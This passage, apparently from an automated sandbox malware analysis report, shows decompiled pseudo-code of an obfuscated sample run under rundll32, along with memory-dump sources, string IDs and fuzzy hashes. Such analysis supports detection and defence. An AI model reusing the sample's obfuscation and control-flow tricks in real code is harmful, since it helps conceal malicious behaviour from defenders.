                                                                                                                                                            				_v104 = _v104 ^ 0x00e3f730;
                                                                                                                                                            				_v92 = 0xd38a43;
                                                                                                                                                            				_v92 = _v92 >> 3;
                                                                                                                                                            				_v92 = _v92 + 0x6fd1;
                                                                                                                                                            				_v92 = _v92 ^ 0x0012c73c;
                                                                                                                                                            				_v64 = 0x625266;
                                                                                                                                                            				_v64 = _v64 + 0x2436;
                                                                                                                                                            				_v64 = _v64 ^ 0x006987c3;
                                                                                                                                                            				_v68 = 0xe296bd;
                                                                                                                                                            				_v68 = _v68 << 0xd;
                                                                                                                                                            				_v68 = _v68 ^ 0x52d9a139;
                                                                                                                                                            				_v72 = 0x54a2fd;
                                                                                                                                                            				_v72 = _v72 << 0xd;
                                                                                                                                                            				_v72 = _v72 >> 0xa;
                                                                                                                                                            				_v72 = _v72 ^ 0x002b3e4c;
                                                                                                                                                            				_v76 = 0x32cdcd;
                                                                                                                                                            				_v76 = _v76 << 0xb;
                                                                                                                                                            				_t223 = 0x32;
                                                                                                                                                            				_v76 = _v76 / _t223;
                                                                                                                                                            				_v76 = _v76 ^ 0x0302c408;
                                                                                                                                                            				_v48 = 0x2d2164;
                                                                                                                                                            				_v48 = _v48 + 0xfffff0e0;
                                                                                                                                                            				_v48 = _v48 ^ 0x0021ab5a;
                                                                                                                                                            				do {
                                                                                                                                                            					while(_t197 != 0x2168849) {
                                                                                                                                                            						if(_t197 == 0x29fa3de) {
                                                                                                                                                            							_t184 = E00372A21(_v84, _v100,  &_v44, _t219 + 0x20, _v104);
                                                                                                                                                            							_t226 =  &(_t226[3]);
                                                                                                                                                            							__eflags = _t184;
                                                                                                                                                            							if(__eflags != 0) {
                                                                                                                                                            								_t197 = 0x74ac459;
                                                                                                                                                            								continue;
                                                                                                                                                            							}
                                                                                                                                                            						} else {
                                                                                                                                                            							if(_t197 == 0x545de14) {
                                                                                                                                                            								E00373DBC( &_v44, _t195, _v56, _v60, _v108);
                                                                                                                                                            								_t226 =  &(_t226[3]);
                                                                                                                                                            								_t197 = 0x2168849;
                                                                                                                                                            								continue;
                                                                                                                                                            							} else {
                                                                                                                                                            								if(_t197 == 0x6ab10c5) {
                                                                                                                                                            									_t189 = E00372A21(_v112, _v88,  &_v44, _t219 + 0x1c, _v116);
                                                                                                                                                            									_t226 =  &(_t226[3]);
                                                                                                                                                            									__eflags = _t189;
                                                                                                                                                            									if(__eflags != 0) {
                                                                                                                                                            										_t197 = 0x29fa3de;
                                                                                                                                                            										continue;
                                                                                                                                                            									}
                                                                                                                                                            								} else {
                                                                                                                                                            									if(_t197 == 0x74ac459) {
                                                                                                                                                            										_t192 = E00372A21(_v92, _v64,  &_v44, _t219 + 0x28, _v68);
                                                                                                                                                            										_t226 =  &(_t226[3]);
                                                                                                                                                            										__eflags = _t192;
                                                                                                                                                            										if(__eflags != 0) {
                                                                                                                                                            											_t197 = 0x9dbfb8a;
                                                                                                                                                            											continue;
                                                                                                                                                            										}
                                                                                                                                                            									} else {
                                                                                                                                                            										if(_t197 == 0x9dbfb8a) {
                                                                                                                                                            											__eflags = E0038D97D( &_v44, _v72, __eflags, _v76, _t219 + 4, _v48);
                                                                                                                                                            											_t220 =  !=  ? 1 : _t220;
                                                                                                                                                            											__eflags = _t220;
                                                                                                                                                            										} else {
                                                                                                                                                            											if(_t197 != 0xf39239f) {
                                                                                                                                                            												goto L19;
                                                                                                                                                            											} else {
                                                                                                                                                            												_t197 = 0x545de14;
                                                                                                                                                            												continue;
                                                                                                                                                            											}
                                                                                                                                                            										}
                                                                                                                                                            									}
                                                                                                                                                            								}
                                                                                                                                                            							}
                                                                                                                                                            						}
                                                                                                                                                            						L22:
                                                                                                                                                            						return _t220;
                                                                                                                                                            					}
                                                                                                                                                            					_t181 = E00372A21(_v52, _v80,  &_v44, _t219 + 0x14, _v96);
                                                                                                                                                            					_t226 =  &(_t226[3]);
                                                                                                                                                            					__eflags = _t181;
                                                                                                                                                            					if(__eflags == 0) {
                                                                                                                                                            						_t197 = 0x90a774d;
                                                                                                                                                            						goto L19;
                                                                                                                                                            					} else {
                                                                                                                                                            						_t197 = 0x6ab10c5;
                                                                                                                                                            						continue;
                                                                                                                                                            					}
                                                                                                                                                            					goto L22;
                                                                                                                                                            					L19:
                                                                                                                                                            					__eflags = _t197 - 0x90a774d;
                                                                                                                                                            				} while (__eflags != 0);
                                                                                                                                                            				goto L22;
                                                                                                                                                            			}

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 5th8$6$$L>+$Mw$Mw$d!-$fRb
                                                                                                                                                            • API String ID: 0-2045295228
                                                                                                                                                            • Opcode ID: 6f2f31d65536ce47fea8f5922934b6de45e61ae0ad55fa75fcdf554af6f56bec
                                                                                                                                                            • Instruction ID: a32681dbc8afda384df46331e1a9f441ae21d89d419da057b6942d68d3562eab
                                                                                                                                                            • Opcode Fuzzy Hash: 6f2f31d65536ce47fea8f5922934b6de45e61ae0ad55fa75fcdf554af6f56bec
                                                                                                                                                            • Instruction Fuzzy Hash: 279177B2508341ABC7A5CE61C88941BFBF9FBD8758F00891DF58696220D7B5DA19CF83
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 92%
                                                                                                                                                            			E0037E2CC(void* __edx, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                            				char _v556;
                                                                                                                                                            				intOrPtr _v576;
                                                                                                                                                            				char _v600;
                                                                                                                                                            				signed int _v604;
                                                                                                                                                            				signed int _v608;
                                                                                                                                                            				signed int _v612;
                                                                                                                                                            				signed int _v616;
                                                                                                                                                            				signed int _v620;
                                                                                                                                                            				signed int _v624;
                                                                                                                                                            				signed int _v628;
                                                                                                                                                            				signed int _v632;
                                                                                                                                                            				signed int _v636;
                                                                                                                                                            				signed int _v640;
                                                                                                                                                            				signed int _v644;
                                                                                                                                                            				signed int _v648;
                                                                                                                                                            				signed int _v652;
                                                                                                                                                            				void* __ecx;
                                                                                                                                                            				void* _t136;
                                                                                                                                                            				void* _t151;
                                                                                                                                                            				signed int _t153;
                                                                                                                                                            				signed int _t156;
                                                                                                                                                            				void* _t162;
                                                                                                                                                            				signed int _t167;
                                                                                                                                                            				intOrPtr _t187;
                                                                                                                                                            				signed int _t188;
                                                                                                                                                            				signed int _t189;
                                                                                                                                                            				signed int _t190;
                                                                                                                                                            				signed int _t191;
                                                                                                                                                            				signed int _t192;
                                                                                                                                                            				signed int* _t196;
                                                                                                                                                            
                                                                                                                                                            				_push(_a12);
                                                                                                                                                            				_t187 = _a8;
                                                                                                                                                            				_push(_t187);
                                                                                                                                                            				_push(E00378E4D);
                                                                                                                                                            				_push(__edx);
                                                                                                                                                            				E003820B9(_t136);
                                                                                                                                                            				_v608 = 0x1ac257;
                                                                                                                                                            				_t196 =  &(( &_v652)[5]);
                                                                                                                                                            				_v608 = _v608 ^ 0x78a3296c;
                                                                                                                                                            				_v608 = _v608 ^ 0x78b9eb39;
                                                                                                                                                            				_t162 = 0xac58df2;
                                                                                                                                                            				_v624 = 0x387e66;
                                                                                                                                                            				_t9 =  &_v624; // 0x387e66
                                                                                                                                                            				_t188 = 0x2e;
                                                                                                                                                            				_v624 =  *_t9 * 0x13;
                                                                                                                                                            				_v624 = _v624 / _t188;
                                                                                                                                                            				_v624 = _v624 ^ 0x001972d5;
                                                                                                                                                            				_v644 = 0x433552;
                                                                                                                                                            				_v644 = _v644 + 0xffffa6b6;
                                                                                                                                                            				_v644 = _v644 ^ 0x94defa20;
                                                                                                                                                            				_v644 = _v644 << 1;
                                                                                                                                                            				_v644 = _v644 ^ 0x293db944;
                                                                                                                                                            				_v652 = 0xb70b59;
                                                                                                                                                            				_v652 = _v652 << 0xb;
                                                                                                                                                            				_v652 = _v652 + 0xffff8138;
                                                                                                                                                            				_t189 = 0x15;
                                                                                                                                                            				_v652 = _v652 / _t189;
                                                                                                                                                            				_v652 = _v652 ^ 0x08c5a62f;
                                                                                                                                                            				_v616 = 0xf4782f;
                                                                                                                                                            				_v616 = _v616 >> 0xa;
                                                                                                                                                            				_v616 = _v616 + 0xffff066a;
                                                                                                                                                            				_v616 = _v616 ^ 0xfff8c7bc;
                                                                                                                                                            				_v604 = 0x656560;
                                                                                                                                                            				_v604 = _v604 >> 3;
                                                                                                                                                            				_v604 = _v604 ^ 0x0000606f;
                                                                                                                                                            				_v648 = 0x377d9b;
                                                                                                                                                            				_t190 = 0x7f;
                                                                                                                                                            				_v648 = _v648 / _t190;
                                                                                                                                                            				_v648 = _v648 + 0xfd7f;
                                                                                                                                                            				_v648 = _v648 + 0xffff6b0a;
                                                                                                                                                            				_v648 = _v648 ^ 0x00006649;
                                                                                                                                                            				_v636 = 0x80cedd;
                                                                                                                                                            				_t191 = 0x58;
                                                                                                                                                            				_v636 = _v636 / _t191;
                                                                                                                                                            				_v636 = _v636 + 0x515e;
                                                                                                                                                            				_v636 = _v636 ^ 0x000b92de;
                                                                                                                                                            				_v620 = 0x65d9bd;
                                                                                                                                                            				_v620 = _v620 + 0xffff4b50;
                                                                                                                                                            				_v620 = _v620 ^ 0xd34cfccc;
                                                                                                                                                            				_v620 = _v620 ^ 0xd32e4bd2;
                                                                                                                                                            				_v632 = 0xb89e86;
                                                                                                                                                            				_v632 = _v632 + 0xffffcc79;
                                                                                                                                                            				_t192 = 0x2f;
                                                                                                                                                            				_v632 = _v632 / _t192;
                                                                                                                                                            				_v632 = _v632 ^ 0x00046a67;
                                                                                                                                                            				_v628 = 0xbb1c4a;
                                                                                                                                                            				_v628 = _v628 >> 6;
                                                                                                                                                            				_v628 = _v628 >> 9;
                                                                                                                                                            				_v628 = _v628 ^ 0x000a4ee8;
                                                                                                                                                            				_v640 = 0xfd7114;
                                                                                                                                                            				_v640 = _v640 << 5;
                                                                                                                                                            				_v640 = _v640 * 0x45;
                                                                                                                                                            				_v640 = _v640 + 0xa2ea;
                                                                                                                                                            				_v640 = _v640 ^ 0x89e0c310;
                                                                                                                                                            				_v612 = 0x26e293;
                                                                                                                                                            				_v612 = _v612 >> 0xd;
                                                                                                                                                            				_v612 = _v612 ^ 0x00050986;
                                                                                                                                                            				_t193 = _v612;
                                                                                                                                                            				do {
                                                                                                                                                            					while(_t162 != 0x249e110) {
                                                                                                                                                            						if(_t162 == 0x48c9d54) {
                                                                                                                                                            							_v556 = 0x22c;
                                                                                                                                                            							_t153 = E0038C15D(_t193, _v652, _v616,  &_v556, _v604);
                                                                                                                                                            							_t196 =  &(_t196[3]);
                                                                                                                                                            							asm("sbb ecx, ecx");
                                                                                                                                                            							_t167 =  ~_t153 & 0xf758a92f;
                                                                                                                                                            							L13:
                                                                                                                                                            							_t162 = _t167 + 0xe63f1a5;
                                                                                                                                                            							continue;
                                                                                                                                                            						}
                                                                                                                                                            						if(_t162 == 0x5bc9ad4) {
                                                                                                                                                            							_t156 = E00378E4D( &_v556,  &_v600);
                                                                                                                                                            							asm("sbb ecx, ecx");
                                                                                                                                                            							_t167 =  ~_t156 & 0xf3e5ef6b;
                                                                                                                                                            							goto L13;
                                                                                                                                                            						}
                                                                                                                                                            						if(_t162 == 0xac58df2) {
                                                                                                                                                            							_v576 = _t187;
                                                                                                                                                            							_t162 = 0xcf1a497;
                                                                                                                                                            							continue;
                                                                                                                                                            						}
                                                                                                                                                            						if(_t162 != 0xcf1a497) {
                                                                                                                                                            							if(_t162 == 0xe63f1a5) {
                                                                                                                                                            								return E00381E67(_v632, _v628, _v640, _v612, _t193);
                                                                                                                                                            							}
                                                                                                                                                            							goto L18;
                                                                                                                                                            						}
                                                                                                                                                            						_push(_t162);
                                                                                                                                                            						_t156 = E00375988(_t162, _v608);
                                                                                                                                                            						_t193 = _t156;
                                                                                                                                                            						if(_t156 != 0xffffffff) {
                                                                                                                                                            							_t162 = 0x48c9d54;
                                                                                                                                                            							continue;
                                                                                                                                                            						}
                                                                                                                                                            						L8:
                                                                                                                                                            						return _t156;
                                                                                                                                                            					}
                                                                                                                                                            					_t151 = E00372A58(_v648, _t193,  &_v556, _v636, _v620);
                                                                                                                                                            					_t196 =  &(_t196[3]);
                                                                                                                                                            					if(_t151 == 0) {
                                                                                                                                                            						_t162 = 0xe63f1a5;
                                                                                                                                                            						goto L18;
                                                                                                                                                            					} else {
                                                                                                                                                            						_t162 = 0x5bc9ad4;
                                                                                                                                                            						continue;
                                                                                                                                                            					}
                                                                                                                                                            					goto L8;
                                                                                                                                                            					L18:
                                                                                                                                                            				} while (_t162 != 0xad68edc);
                                                                                                                                                            				return _t156;
                                                                                                                                                            			}
                                                                                                                                                            0x0037e39a
                                                                                                                                                            0x0037e3a2
                                                                                                                                                            0x0037e3aa
                                                                                                                                                            0x0037e3b2
                                                                                                                                                            0x0037e3b7
                                                                                                                                                            0x0037e3bf
                                                                                                                                                            0x0037e3cb
                                                                                                                                                            0x0037e3d0
                                                                                                                                                            0x0037e3d6
                                                                                                                                                            0x0037e3de
                                                                                                                                                            0x0037e3e6
                                                                                                                                                            0x0037e3ee
                                                                                                                                                            0x0037e3fa
                                                                                                                                                            0x0037e3ff
                                                                                                                                                            0x0037e405
                                                                                                                                                            0x0037e40d
                                                                                                                                                            0x0037e415
                                                                                                                                                            0x0037e41d
                                                                                                                                                            0x0037e425
                                                                                                                                                            0x0037e42d
                                                                                                                                                            0x0037e435
                                                                                                                                                            0x0037e43d
                                                                                                                                                            0x0037e449
                                                                                                                                                            0x0037e44c
                                                                                                                                                            0x0037e450
                                                                                                                                                            0x0037e458
                                                                                                                                                            0x0037e460
                                                                                                                                                            0x0037e46a
                                                                                                                                                            0x0037e474
                                                                                                                                                            0x0037e47c
                                                                                                                                                            0x0037e484
                                                                                                                                                            0x0037e48e
                                                                                                                                                            0x0037e492
                                                                                                                                                            0x0037e49a
                                                                                                                                                            0x0037e4a2
                                                                                                                                                            0x0037e4aa
                                                                                                                                                            0x0037e4af
                                                                                                                                                            0x0037e4b7
                                                                                                                                                            0x0037e4bb
                                                                                                                                                            0x0037e4bb
                                                                                                                                                            0x0037e4c9
                                                                                                                                                            0x0037e56a
                                                                                                                                                            0x0037e57d
                                                                                                                                                            0x0037e582
                                                                                                                                                            0x0037e589
                                                                                                                                                            0x0037e58b
                                                                                                                                                            0x0037e55b
                                                                                                                                                            0x0037e55b
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037e55b
                                                                                                                                                            0x0037e4d5
                                                                                                                                                            0x0037e54a
                                                                                                                                                            0x0037e553
                                                                                                                                                            0x0037e555
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037e555
                                                                                                                                                            0x0037e4dd
                                                                                                                                                            0x0037e532
                                                                                                                                                            0x0037e536
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037e536
                                                                                                                                                            0x0037e4e5
                                                                                                                                                            0x0037e4e9
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037e505
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037e4e9
                                                                                                                                                            0x0037e51b
                                                                                                                                                            0x0037e520
                                                                                                                                                            0x0037e525
                                                                                                                                                            0x0037e52c
                                                                                                                                                            0x0037e52e
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037e52e
                                                                                                                                                            0x0037e512
                                                                                                                                                            0x0037e512
                                                                                                                                                            0x0037e512
                                                                                                                                                            0x0037e5a6
                                                                                                                                                            0x0037e5ab
                                                                                                                                                            0x0037e5b0
                                                                                                                                                            0x0037e5bc
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037e5b2
                                                                                                                                                            0x0037e5b2
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037e5b2
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037e5be
                                                                                                                                                            0x0037e5be
                                                                                                                                                            0x00000000

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: If$R5C$^Q$`ee$f~8$o`$N
                                                                                                                                                            • API String ID: 0-3572798563
                                                                                                                                                            • Opcode ID: 1c1808546292c5ddace4df48c7fe15d144b20acd95025d433bf260c8050023d9
                                                                                                                                                            • Instruction ID: 94d1ee4ef7bea5a42ea936dc1309f7312eac3f98bf41a9cf9423364969325bde
                                                                                                                                                            • Opcode Fuzzy Hash: 1c1808546292c5ddace4df48c7fe15d144b20acd95025d433bf260c8050023d9
                                                                                                                                                            • Instruction Fuzzy Hash: 7C717872508301DFC369CF22C48945FBBE1EBC4768F508A5DF59A962A0D779CA09CF86
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • _strcpy_s.LIBCMT ref: 10014B9E
                                                                                                                                                              • Part of subcall function 100311F4: __getptd_noexit.LIBCMT ref: 100311F4
                                                                                                                                                            • __snprintf_s.LIBCMT ref: 10014BD7
                                                                                                                                                              • Part of subcall function 1003119A: __vsnprintf_s_l.LIBCMT ref: 100311AF
                                                                                                                                                            • GetLocaleInfoA.KERNEL32(00000800,00000003,?,00000004), ref: 10014C02
                                                                                                                                                            • LoadLibraryA.KERNEL32(?), ref: 10014C25
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: InfoLibraryLoadLocale__getptd_noexit__snprintf_s__vsnprintf_s_l_strcpy_s
                                                                                                                                                            • String ID: LOC
                                                                                                                                                            • API String ID: 3864805678-519433814
                                                                                                                                                            • Opcode ID: 993ef955d11e1d056c0da4e243e940ae0abcf9c49e17b7ca6a81ba24efbb4c92
                                                                                                                                                            • Instruction ID: c6b9acf05ba5f485c5c472c95a6cc1a1d49ea65b07ecc8430683ae88ba63382e
                                                                                                                                                            • Opcode Fuzzy Hash: 993ef955d11e1d056c0da4e243e940ae0abcf9c49e17b7ca6a81ba24efbb4c92
                                                                                                                                                            • Instruction Fuzzy Hash: B011E471900118AFDB11DB64CC86BDD73B8EF09315F1241A1F7059F0A1EEB0E9859AD1
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                            			E0037CF47(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr* _a16, intOrPtr _a20) {
                                                                                                                                                            				char _v32;
                                                                                                                                                            				intOrPtr _v40;
                                                                                                                                                            				intOrPtr _v52;
                                                                                                                                                            				intOrPtr _v56;
                                                                                                                                                            				intOrPtr _v88;
                                                                                                                                                            				char* _v92;
                                                                                                                                                            				char _v112;
                                                                                                                                                            				char _v120;
                                                                                                                                                            				intOrPtr _v124;
                                                                                                                                                            				char _v128;
                                                                                                                                                            				signed int _v132;
                                                                                                                                                            				signed int _v136;
                                                                                                                                                            				signed int _v140;
                                                                                                                                                            				signed int _v144;
                                                                                                                                                            				signed int _v148;
                                                                                                                                                            				signed int _v152;
                                                                                                                                                            				signed int _v156;
                                                                                                                                                            				signed int _v160;
                                                                                                                                                            				signed int _v164;
                                                                                                                                                            				signed int _v168;
                                                                                                                                                            				signed int _v172;
                                                                                                                                                            				signed int _v176;
                                                                                                                                                            				signed int _v180;
                                                                                                                                                            				signed int _v184;
                                                                                                                                                            				signed int _v188;
                                                                                                                                                            				signed int _v192;
                                                                                                                                                            				signed int _v196;
                                                                                                                                                            				signed int _v200;
                                                                                                                                                            				signed int _v204;
                                                                                                                                                            				signed int _v208;
                                                                                                                                                            				signed int _v212;
                                                                                                                                                            				signed int _v216;
                                                                                                                                                            				signed int _v220;
                                                                                                                                                            				signed int _v224;
                                                                                                                                                            				signed int _v228;
                                                                                                                                                            				signed int _v232;
                                                                                                                                                            				signed int _v236;
                                                                                                                                                            				signed int _v240;
                                                                                                                                                            				signed int _v244;
                                                                                                                                                            				signed int _v248;
                                                                                                                                                            				signed int _v252;
                                                                                                                                                            				signed int _v256;
                                                                                                                                                            				signed int _v260;
                                                                                                                                                            				signed int _v264;
                                                                                                                                                            				signed int _v268;
                                                                                                                                                            				void* _t345;
                                                                                                                                                            				void* _t377;
                                                                                                                                                            				void* _t378;
                                                                                                                                                            				void* _t386;
                                                                                                                                                            				void* _t393;
                                                                                                                                                            				intOrPtr _t403;
                                                                                                                                                            				intOrPtr* _t406;
                                                                                                                                                            				void* _t408;
                                                                                                                                                            				signed char* _t414;
                                                                                                                                                            				signed char* _t450;
                                                                                                                                                            				intOrPtr* _t455;
                                                                                                                                                            				intOrPtr _t456;
                                                                                                                                                            				intOrPtr _t457;
                                                                                                                                                            				void* _t458;
                                                                                                                                                            				signed char* _t459;
                                                                                                                                                            				signed int _t460;
                                                                                                                                                            				signed int _t461;
                                                                                                                                                            				signed int _t462;
                                                                                                                                                            				signed int _t463;
                                                                                                                                                            				signed int _t464;
                                                                                                                                                            				signed int _t465;
                                                                                                                                                            				signed int _t466;
                                                                                                                                                            				signed int _t467;
                                                                                                                                                            				signed int _t468;
                                                                                                                                                            				signed int _t469;
                                                                                                                                                            				void* _t470;
                                                                                                                                                            				void* _t471;
                                                                                                                                                            				void* _t474;
                                                                                                                                                            
                                                                                                                                                            				_t406 = _a8;
                                                                                                                                                            				_t456 = _a4;
                                                                                                                                                            				_push(_a20);
                                                                                                                                                            				_t455 = _a16;
                                                                                                                                                            				_push(_t455);
                                                                                                                                                            				_push(_a12);
                                                                                                                                                            				_push(_t406);
                                                                                                                                                            				_push(_t456);
                                                                                                                                                            				_push(__edx);
                                                                                                                                                            				_push(__ecx);
                                                                                                                                                            				E003820B9(_t345);
                                                                                                                                                            				_v256 = 0xcf1dac;
                                                                                                                                                            				_t471 = _t470 + 0x1c;
                                                                                                                                                            				_v256 = _v256 ^ 0x662b1d0f;
                                                                                                                                                            				_v256 = _v256 << 2;
                                                                                                                                                            				_t408 = 0x8e80a37;
                                                                                                                                                            				_v256 = _v256 + 0xffff9089;
                                                                                                                                                            				_v256 = _v256 ^ 0x9b8f9315;
                                                                                                                                                            				_v160 = 0x25617a;
                                                                                                                                                            				_v160 = _v160 << 2;
                                                                                                                                                            				_v160 = _v160 ^ 0x009585a8;
                                                                                                                                                            				_v264 = 0x39e017;
                                                                                                                                                            				_v264 = _v264 + 0xffffbc9c;
                                                                                                                                                            				_v264 = _v264 ^ 0xb11c7ead;
                                                                                                                                                            				_v264 = _v264 + 0xffffd7b2;
                                                                                                                                                            				_v264 = _v264 ^ 0xb125b990;
                                                                                                                                                            				_v240 = 0xb82586;
                                                                                                                                                            				_t460 = 0x74;
                                                                                                                                                            				_v240 = _v240 / _t460;
                                                                                                                                                            				_v240 = _v240 << 1;
                                                                                                                                                            				_t461 = 0x3b;
                                                                                                                                                            				_v132 = _v132 & 0x00000000;
                                                                                                                                                            				_v240 = _v240 * 0x36;
                                                                                                                                                            				_v240 = _v240 ^ 0x00aace1a;
                                                                                                                                                            				_v180 = 0xcab8fe;
                                                                                                                                                            				_v180 = _v180 ^ 0xca9451c5;
                                                                                                                                                            				_v180 = _v180 | 0x3e03c42f;
                                                                                                                                                            				_v180 = _v180 ^ 0xfe5c53ad;
                                                                                                                                                            				_v248 = 0x57862;
                                                                                                                                                            				_v248 = _v248 | 0x3f7dcfba;
                                                                                                                                                            				_v248 = _v248 / _t461;
                                                                                                                                                            				_t462 = 0x62;
                                                                                                                                                            				_v248 = _v248 / _t462;
                                                                                                                                                            				_v248 = _v248 ^ 0x00057d9a;
                                                                                                                                                            				_v252 = 0x68f561;
                                                                                                                                                            				_v252 = _v252 << 6;
                                                                                                                                                            				_v252 = _v252 >> 0xd;
                                                                                                                                                            				_v252 = _v252 | 0x3cddc102;
                                                                                                                                                            				_v252 = _v252 ^ 0x3cda88f2;
                                                                                                                                                            				_v192 = 0x7c8e99;
                                                                                                                                                            				_v192 = _v192 + 0x829c;
                                                                                                                                                            				_v192 = _v192 * 0x31;
                                                                                                                                                            				_v192 = _v192 ^ 0x17fda794;
                                                                                                                                                            				_v228 = 0x74d91a;
                                                                                                                                                            				_v228 = _v228 << 3;
                                                                                                                                                            				_v228 = _v228 + 0x7502;
                                                                                                                                                            				_v228 = _v228 * 0x63;
                                                                                                                                                            				_v228 = _v228 ^ 0x69a7ce60;
                                                                                                                                                            				_v208 = 0xc909ae;
                                                                                                                                                            				_v208 = _v208 << 1;
                                                                                                                                                            				_t463 = 0xb;
                                                                                                                                                            				_v208 = _v208 / _t463;
                                                                                                                                                            				_v208 = _v208 ^ 0x00276772;
                                                                                                                                                            				_v164 = 0x673800;
                                                                                                                                                            				_v164 = _v164 << 9;
                                                                                                                                                            				_v164 = _v164 ^ 0xce7e8a93;
                                                                                                                                                            				_v232 = 0xb859bd;
                                                                                                                                                            				_v232 = _v232 + 0xde76;
                                                                                                                                                            				_t464 = 0x5b;
                                                                                                                                                            				_v232 = _v232 * 0x1c;
                                                                                                                                                            				_v232 = _v232 * 0x30;
                                                                                                                                                            				_v232 = _v232 ^ 0xcc63b0a7;
                                                                                                                                                            				_v172 = 0x7eda56;
                                                                                                                                                            				_v172 = _v172 << 3;
                                                                                                                                                            				_v172 = _v172 ^ 0x03f50911;
                                                                                                                                                            				_v184 = 0x2f7891;
                                                                                                                                                            				_v184 = _v184 / _t464;
                                                                                                                                                            				_t465 = 0x41;
                                                                                                                                                            				_v184 = _v184 * 0x49;
                                                                                                                                                            				_v184 = _v184 ^ 0x0024fbf7;
                                                                                                                                                            				_v148 = 0x4a0bea;
                                                                                                                                                            				_v148 = _v148 ^ 0x502016f1;
                                                                                                                                                            				_v148 = _v148 ^ 0x506ad42a;
                                                                                                                                                            				_v260 = 0x9ebd58;
                                                                                                                                                            				_v260 = _v260 >> 8;
                                                                                                                                                            				_v260 = _v260 << 0xf;
                                                                                                                                                            				_v260 = _v260 + 0xb306;
                                                                                                                                                            				_v260 = _v260 ^ 0x4f54a3e8;
                                                                                                                                                            				_v204 = 0xce3506;
                                                                                                                                                            				_v204 = _v204 << 0xf;
                                                                                                                                                            				_v204 = _v204 << 0xc;
                                                                                                                                                            				_v204 = _v204 ^ 0x300ddb73;
                                                                                                                                                            				_v244 = 0xe7c592;
                                                                                                                                                            				_v244 = _v244 >> 5;
                                                                                                                                                            				_v244 = _v244 ^ 0x506a7775;
                                                                                                                                                            				_v244 = _v244 << 1;
                                                                                                                                                            				_v244 = _v244 ^ 0xa0d2afa7;
                                                                                                                                                            				_v268 = 0x1d8a79;
                                                                                                                                                            				_v268 = _v268 << 2;
                                                                                                                                                            				_v268 = _v268 / _t465;
                                                                                                                                                            				_v268 = _v268 | 0x253986a4;
                                                                                                                                                            				_v268 = _v268 ^ 0x2531568a;
                                                                                                                                                            				_v216 = 0x116531;
                                                                                                                                                            				_t466 = 0x61;
                                                                                                                                                            				_v216 = _v216 * 0x66;
                                                                                                                                                            				_v216 = _v216 ^ 0xfffdc9ed;
                                                                                                                                                            				_v216 = _v216 ^ 0xf917010b;
                                                                                                                                                            				_v200 = 0xc05f9c;
                                                                                                                                                            				_v200 = _v200 / _t466;
                                                                                                                                                            				_v200 = _v200 * 0x6f;
                                                                                                                                                            				_v200 = _v200 ^ 0x00dca3d1;
                                                                                                                                                            				_v212 = 0xdb89ea;
                                                                                                                                                            				_v212 = _v212 >> 0xa;
                                                                                                                                                            				_v212 = _v212 >> 9;
                                                                                                                                                            				_v212 = _v212 ^ 0x0000ad8d;
                                                                                                                                                            				_v152 = 0x38fb70;
                                                                                                                                                            				_v152 = _v152 ^ 0x310cc67b;
                                                                                                                                                            				_v152 = _v152 ^ 0x313af23a;
                                                                                                                                                            				_v136 = 0x7e2008;
                                                                                                                                                            				_v136 = _v136 ^ 0x7ad3030b;
                                                                                                                                                            				_v136 = _v136 ^ 0x7aaaa86e;
                                                                                                                                                            				_v196 = 0x9c4278;
